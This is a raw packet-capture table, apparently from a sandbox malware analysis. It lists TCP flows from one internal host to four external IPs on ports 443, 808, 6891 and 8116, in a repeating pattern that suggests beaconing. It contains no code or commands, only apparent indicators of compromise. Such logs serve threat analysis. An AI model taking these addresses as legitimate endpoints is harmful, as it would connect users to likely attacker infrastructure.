Oct 28, 2021 05:26:32.416573048 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.532193899 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:32.704977989 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:32.705158949 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:32.705924034 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:32.718668938 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.718863010 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.719543934 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.719552040 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.725341082 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.725351095 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.725533009 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.725543022 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.878549099 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:32.878607988 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:32.878777981 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:32.879395008 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:32.885374069 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:32.885405064 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.051902056 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.058017015 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.058037043 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.058043957 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.058063984 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.436959982 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:33.437077999 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:33.437079906 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:33.437155008 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:33.440139055 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.440187931 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.440243006 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.440284014 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.440521955 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:33.440540075 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:33.448580027 CEST	49782	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.558034897 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.604337931 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.621381044 CEST	808	49782	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.724379063 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:33.724503040 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.725364923 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.775538921 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.775651932 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.776299000 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.892982006 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:33.893004894 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:33.896316051 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.897317886 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.905649900 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.905690908 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:33.947205067 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.947341919 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:33.947427034 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.948055029 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.954771996 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:33.954864979 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:34.071759939 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.071780920 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.118917942 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.125659943 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.125694036 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.125715971 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.452914953 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.452934980 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.453022003 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.462304115 CEST	49783	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.510569096 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.510663986 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.510799885 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:34.512830019 CEST	49784	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:34.579822063 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.623961926 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.628360987 CEST	6891	49783	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.633965969 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.634397984 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.635068893 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.683911085 CEST	808	49784	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:34.688127041 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.688458920 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.691519976 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.691962004 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.695924044 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.696034908 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.749119043 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.749835014 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.790148973 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.790282011 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.790972948 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.936007977 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.936048985 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:34.936166048 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.943263054 CEST	49785	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:34.956970930 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.957026005 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:34.957102060 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.957500935 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.961879969 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.962028027 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:34.996646881 CEST	8116	49785	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.062944889 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.063004017 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:35.063143969 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.063920975 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.063975096 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:35.128746033 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:35.128773928 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:35.167213917 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:35.509955883 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:35.510009050 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:35.510118961 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:35.510150909 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:35.514870882 CEST	49786	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:35.583101034 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:35.583225012 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.583817005 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.583833933 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:35.590977907 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.590998888 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:35.591101885 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:35.591114998 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:35.641146898 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.680978060 CEST	6891	49786	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:35.697798967 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.697937965 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.698920965 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.755363941 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.755600929 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.755728006 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.756294966 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.765347958 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.765598059 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.822544098 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.995663881 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.995687008 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:35.995754004 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.995781898 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:35.999490976 CEST	49788	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:36.056061029 CEST	8116	49788	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:36.119371891 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.119417906 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.119514942 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.120300055 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.120311975 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.295231104 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.295298100 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.295312881 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.295346022 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.300836086 CEST	49787	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.300868034 CEST	443	49787	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.467123985 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.637481928 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:36.637598991 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.638390064 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.639975071 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.640045881 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.640568972 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.640578032 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.644788027 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.644807100 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.644893885 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:36.644903898 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:36.808614016 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:36.808660984 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:36.808876038 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.809293985 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.813092947 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.813196898 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:36.979510069 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:36.983324051 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:36.983350039 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:36.983364105 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.351632118 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:37.351716042 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:37.351821899 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:37.351851940 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:37.354763031 CEST	49789	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:37.354780912 CEST	443	49789	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:37.359658003 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.359689951 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.359846115 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.359884977 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.366565943 CEST	49790	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.470560074 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.481492043 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.537096977 CEST	808	49790	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.632493019 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.632673025 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.633357048 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.647408962 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:37.647591114 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.648824930 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.794651031 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.794671059 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.794850111 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.795434952 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.801605940 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.801625967 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:37.815013885 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:37.815335989 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:37.815445900 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.816070080 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.819739103 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.820178032 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:37.956135988 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.962019920 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.962167025 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.962224007 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.962234974 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:37.985842943 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:37.986181974 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.351807117 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:38.351820946 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:38.351916075 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:38.355127096 CEST	49791	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:38.372817039 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.372831106 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.372972965 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.373034000 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.380367041 CEST	49792	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.483542919 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.496541977 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.515594959 CEST	808	49791	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:38.546647072 CEST	6891	49792	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.548568964 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.548713923 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.549511909 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.601427078 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.601541042 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.601697922 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.603504896 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.633410931 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.633527994 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.649588108 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.649684906 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.650572062 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.685851097 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.685992002 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.816880941 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.816931963 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.817133904 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.817615986 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.823956966 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.824088097 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:38.885396004 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.885446072 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.885543108 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.885591030 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.891043901 CEST	49794	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:38.943010092 CEST	8116	49794	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:38.990036964 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:38.990063906 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:39.013907909 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.013967991 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.014050961 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.014547110 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.014563084 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.027328968 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:39.367130995 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:39.367151976 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:39.367198944 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:39.367232084 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:39.370095968 CEST	49793	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:39.480631113 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.500099897 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.500247955 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.500910997 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.500941992 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.508198023 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.508240938 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.508306980 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.508328915 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.534228086 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.534435034 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.535146952 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.536011934 CEST	6891	49793	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:39.588299990 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.588516951 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.588592052 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.589359999 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.594656944 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.594789982 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.647830963 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.648087978 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.818124056 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.818142891 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.818303108 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.818365097 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.821511030 CEST	49796	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:39.874579906 CEST	8116	49796	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:39.936964035 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.937006950 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:39.937124968 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.937800884 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:39.937815905 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.202748060 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.202853918 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.202927113 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.202948093 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.209475994 CEST	49795	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.209507942 CEST	443	49795	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.324861050 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.433223009 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.433305979 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.433986902 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.433994055 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.438642979 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.438648939 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.438791037 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:40.438800097 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:40.490271091 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.490431070 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.491298914 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.656691074 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.657013893 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.657115936 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.657630920 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.662492037 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.662605047 CEST	49798	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:40.822196007 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.827023029 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.827115059 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.827128887 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:40.827140093 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.130261898 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:41.130333900 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:41.130502939 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:41.136004925 CEST	49797	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:41.136050940 CEST	443	49797	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:41.217797995 CEST	808	49798	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:41.217820883 CEST	808	49798	143.244.140.214	192.168.2.3
